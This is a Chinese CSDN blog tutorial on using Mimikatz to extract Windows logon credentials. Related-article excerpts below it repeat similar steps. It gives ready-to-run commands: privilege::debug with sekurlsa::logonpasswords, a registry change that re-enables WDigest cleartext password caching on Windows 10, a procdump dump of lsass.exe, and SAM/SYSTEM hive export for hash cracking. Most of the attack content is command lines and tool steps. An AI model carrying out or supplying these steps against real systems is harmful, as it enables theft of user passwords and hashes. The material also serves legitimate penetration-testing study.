mimikatz-windows使用指南

最新推荐文章于 2024-05-25 11:15:12 发布
最新推荐文章于 2024-05-25 11:15:12 发布
阅读量1.9k 收藏 3
点赞数 1
分类专栏: 工具 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ploto_cs/article/details/108851397
版权

mimikatz-windows使用指南

一.程序原理
获取到内存文件 lsass.exe 进程 (它用于本地安全和登陆策略) 中存储的明文登录密码。
二.指令介绍

version查看mimikatz的版本
system::user查看当前登录的系统用户
system::computer查看计算机名称
process::list列出进程
process::suspend进程名称暂停进程
process::stop进程名称结束进程
process::modules列出系统的核心模块及所在位置
service::list列出系统的服务
service::remove移除系统的服
service::remove移除系统的服务
service::startstop服务名称启动或停止服务
privilege::list列出权限列表
privilege::enable激活一个或多个权限
privilege::debug提升权限
nogpo::cmd打开系统的cmd.exe
nogpo::regedit打开系统的注册表
nogpo::taskmgr打开任务管理器
ts::sessions显示当前的会话
ts::processes显示进程和对应的pid情况等
sekurlsa::wdigest获取本地用户信息及密码
sekurlsa::wdigest获取kerberos用户信息及密码
sekurlsa::tspkg获取tspkg用户信息及密码
sekurlsa::logonpasswords获登陆用户信息及密码

三.使用过程
1.win10以下
本次以实验Win7为例
① 右键使用管理员身份打开
在这里插入图片描述

privilege::debug

在这里插入图片描述

sekurlsa::logonpasswords

在这里插入图片描述

2.Win10
在Win10内禁止在内存缓存中保存明文密码
因此可以通过修改注册表选项,恢复明文密码
(1)方法一:
① 管理员身份运行cmd
在这里插入图片描述

② 修改注册表
修改完之后,重新登录账号,此时抓出来的密码就是明文显示
命令:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
在这里插入图片描述

Shutdown -r -t 0

④ 管理员身份运行mimikatz
⑤ 输入命令,获取密码
在这里插入图片描述

(2)方法二:
① 修改注册表(与方法一基本相同)

Shutdown -r -t 0

③ 使用程序procdump抓取dup文件
使用管理员身份打开cmd 并在程序的目录打开procdump.exe
命令:procdump64.exe -accepteula -ma lsass.exe 1.dmp
在这里插入图片描述

④ 在通过mimikatz解析1.dup文件
在这里插入图片描述

注:mimikatz已经集成至Metasploit’s meterpreter,在kali中也可使用

参考文章: https://blog.csdn.net/Z_Z_W_/article/details/104063928
https://www.cnblogs.com/kuaile1314/p/12288476.html

网络信息安全-ploto

ploto_cs
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透神器(Mimikatz)——使用教程
W小哥
04-16 6万+
一、工具简介 Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。 二、Mimikatz命令 cls: 清屏 standard: 标准模块,基本命令 crypto: 加密相关模块 sekurlsa: 与证书相关的模块 kerberos: kerberos模块 privilege: 提权相关模块 process: 进程相关
轻量级调试器神器 - mimikatz
Yatere的天平秤
03-08 2786
昨天有朋友发了个法国佬写的神器叫 mimikatz 让我们看下 神器下载地址: mimikatz_trunk.zip 还有一篇用这个神器直接从 lsass.exe 里获取windows处于active状态账号明文密码的文章 http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from
mimikatz抓取windows明文密码和cs与msf权限传递
最新发布
m0_65540912的博客
05-25 466
在默认情况下,当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,如下图,密码字段显示为null,此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。set payload windows/meterpreter/reverse_http(这个payload要跟设置的payload保持一致)这里注销就需要进行强制锁屏,因为是远程,锁屏需要借助脚本来进行,我这里就直接用电脑锁屏演示一下能否抓取明文。修改注册表之后,需注销用户,重新登录才能生效,才能抓取到明文。
volatility安装+插件安装(mimikatz)
热门推荐
sbingmo的博客
07-11 1万+
volatility安装+插件安装(mimikatz)
内网渗透----使用mimikatz获取windows登陆口令
浅笑996的博客
12-01 1937
以管理员运行后,可以随机打一些字符,进入如下界面 输入aaa::aaa,可展示所有模块: 可采用log命令,保存日志 获取hash与明文用户口令 privilege::debug sekurlsa::logonPasswords 从 Windows 8.1 和 Windows Server 2012 R2 开始,LM 哈希和“纯文本”密码将不在内存中生成,早期版本的Windows ...
mimikatz的基本使用
a3320315的博客
05-25 9762
常见命令 cls-----------------------------清屏 exit----------------------------退出 version------------查看mimikatz的版本 system::user-----查看当前登录的系统用户 system::computer-------查看计算机名称 process::list------------------列出进程 process::suspend 进程名称 -----暂停进程 process::stop 进程名称--
哈希处理介绍-使用Mimikatz以及John对Windows用户密码破解
ran的博客
02-06 6575
Windows系统使用两种算法对用户的密码进行哈希处理, 它们分别是LM-hash算法和NTLMhash算法。所谓哈希(hash) , 就是使用一种加密函数对其进行加密。这个加密函数对一个任意长度的字符串数据进行一次数学加密函数运算,然后返回一个固定长度的字符串。Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash, 第二部分是NTLM-hash。通常可从Windows系统中的SAM文件和域控制器的NTDS.dit文件中获得所有用户的hash。
mimikatz-trunk(2.2.0 20190512 Windows 10 1903).zip
01-06
其次,“README.md”是项目说明文件,通常包含了关于如何安装、配置和使用mimikatz的详细指南。通过阅读此文件,用户可以快速上手,了解如何在Windows 10 1903环境中运行mimikatz,以及如何利用它来获取系统的敏感...
mimikatz_trunk-1_mimikatz_
10-03
2. **README.md**:这是标准的Markdown格式的项目说明文件,通常包含项目的简介、安装指南使用方法以及开发者信息等内容。通过阅读此文件,我们可以深入了解mimikatz的用途、如何运行以及需要注意的事项。 3. **...
内网渗透专用-mimikatz
05-06
2. `README.md`:这是标准的Markdown格式的readme文件,通常会提供项目的基本信息、安装指南使用方法等,对于理解和使用mimikatz至关重要。 3. `kiwi_passwords.yar`:yar文件是YARA规则的格式,YARA是一种用于...
mimikatz_trunk.zip
07-06
2. **README.md**:这是一个Markdown格式的文件,通常包含项目的基本信息、使用指南、安装步骤、更新日志以及开发者想要传达的重要信息。通过阅读README.md,用户可以快速了解Mimikatz的用途、如何运行它以及可能...
逆向sekurlsa.dll_实现读内存获得开机密码_源码
11-05
逆向sekurlsa.dll_实现读内存获得开机密码_源码
mimikatz 2.1
10-27
- **README.md**:这是一个Markdown格式的文件,通常包含了mimikatz的使用指南、更新日志或者开发者对软件的说明。 - **kiwi_passwords.yar**:这可能是一个YARA规则文件,用于匹配和识别特定的密码模式,可能与...
windows账户安全(通过mimikatz、Jhon获取用户密码)
qq_62729556的博客
07-23 2070
使用命令“john-format=NT hash.txt”使用Jhon自带的字典碰撞hash值进行破解。第一步:使用管理员权限,切换到c盘路径,执行命令“reg save hklm\sam sam.hive”和“reg save hklm\system system.hive”将注册表中SAM、System文件导出到本地磁盘。命令“ samdump2 system.hive sam.hive > hash.txt ” 使用sam dump 2工具将sam数据库文件破解成可识别的NTLM hash。
详解Windows渗透测试工具Mimikatz的内核驱动
weixin_60043341的博客
08-17 1143
Mimikatz通过其中包含的Mimidrv驱动程序,提供了利用内核模式的功能。Mimidrv是已经签名的Windows驱动模型(WDM)内核模式软件驱动程序,在相关命令前加上感叹号(!)即可与标准Mimikatz可执行文件共同使用。Mimidrv没有相应文档,并且很少被人使用,但它却提供了一个非常值得关注的方式,让我们可以在ring 0执行一些操作。本文详细分析Mimidrv提供的功能,提出了一些可供大家参考的文档,同时向不太了解内核的读者介绍一些核心概念,最后将提出用于缓解基于驱动的威胁的防范建议。..
神器 mimikatz - 直接抓取 Windows 明文密码
oceanark的博客
07-13 7424
昨天有朋友发了个法国佬写的神器叫 mimikatz让我们看下 神器下载地址: http://blog.gentilkiwi.com/mimikatz 还有一篇用这个神器直接从 lsass.exe 里获取windows处于active状态账号明文密码的文章 http://pentestmonkey.net/blog/mimikatz-tool-to-recover-clear
内网渗透简介
qq_54030686的博客
11-18 1589
内网渗透 内网渗透主要基于端口采用口令或者漏洞扫描,不断的获取新的跳板攻击新的主机 信息收集 内网网段为:192.168.22.0,域名为god.org 开启代理,以便访问内网 获取网络接口(判断是否存在内网) 获取网络接口:run get_local_subnets 查看路由地址:run autoroute -p 添加路由地址:run autoroute -s 192.168.22.0/24 开启本地代理: use auxiliary/server/socks4a set srvport 2222 exp
Mimikatz 使用小技巧
大方子
10-05 2669
1.记录 Mimikatz输出: C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir 2.将输出导入到本地文件: C:\>mimikatz.exe ""privilege::debug"" &quo
轻量级调试器神器 - mimikatz (学习了,很强大的工具)
我的IT乐园
06-01 1万+
神器mimikatz使用详解 一.mimikatz简介   mimikatz是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码。   mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz包含了很多本地模块,更
kali 中mimikatz使用教程
06-28
### 回答1: 这是一个对于使用 Mimikatz 工具的教程。 Mimikatz 是一个开发者用来获取 Windows 认证凭证的工具,它可以解密 Windows 存储的密码,甚至可以获取经过 NTLM 身份验证的密码。 但请注意,使用这个工具可能会涉及到违法行为,请使用时慎重考虑。 ### 回答2: Mimikatz是一款用于提取Windows凭证的工具,它可以用来获取本地Windows用户和域用户的密码、NTLM哈希值和明文密码。本文将介绍如何通过Kali中的Mimikatz工具来实现提取凭证的操作。 1. 安装Mimikatz Mimikatz是Kali自带的工具,在终端中输入以下命令即可安装: ``` apt-get install mimikatz ``` 2. 运行Mimikatz 进入终端,输入以下命令来运行Mimikatz: ``` mimikatz ``` 如果你使用的是64位版本的系统,你还需要输入以下命令: ``` mimikatz # privilege::debug ``` 这个命令会给你的用户添加更多的访问权限,也就是所谓的debug权限。 3. 提取凭证 接下来,你可以通过以下命令来提取凭证: ``` mimikatz # sekurlsa::logonpasswords ``` 这个命令会输出本地计算机上所有用户的明文密码和NTLM哈希值。 如果你想获取域用户的凭证,可以使用以下命令: ``` mimikatz # sekurlsa::logonpasswords full ``` 这个命令会输出域控制器上所有域用户的明文密码和NTLM哈希值。 4. 清除日志和关闭Mimikatz 运行Mimikatz时默认会生成一些日志文件。如果你不希望这些日志留在计算机上,可以使用以下命令来清除日志: ``` mimikatz # log::clear ``` 最后,输入以下命令来关闭Mimikatz: ``` mimikatz # exit ``` 以上就是通过Kali中的Mimikatz工具来实现提取凭证的操作的详细教程。需要注意的是,Mimikatz是一款非常强大的工具,使用时请谨慎,避免造成不必要的损失。 ### 回答3: Kali是一个开源免费的渗透测试操作系统,而mimikatz是一个密码破解工具,常被黑客用于窃取用户密码,因此Kali与mimikatz结合使用可以进行密码破解和渗透测试。 首先,在Kali中下载安装mimikatz。打开终端,输入以下命令: git clone https://github.com/gentilkiwi/mimikatz.git 然后,进入mimikatz文件夹,编译mimikatz工具: cd mimikatz make 编译完成后,输入以下命令即可使用mimikatz: ./mimikatz 接下来,使用privilege模块提升权限: privilege::debug 然后,使用sekurlsa模块获取系统的登录凭据: sekurlsa::logonpasswords 最后,我们可以通过导出文件的方式保存密码信息,输入以下命令: sekurlsa::logonpasswords full log sekurlsa.log 这样就完成了在Kali中使用mimikatz的教程。需要注意的是,这种密码破解和窃取方法是非法的,只能在授权的渗透测试环境中使用。在实际的工作中,我们要始终遵循合法合规的原则,做好安全防护和风险评估工作,确保系统和数据的安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值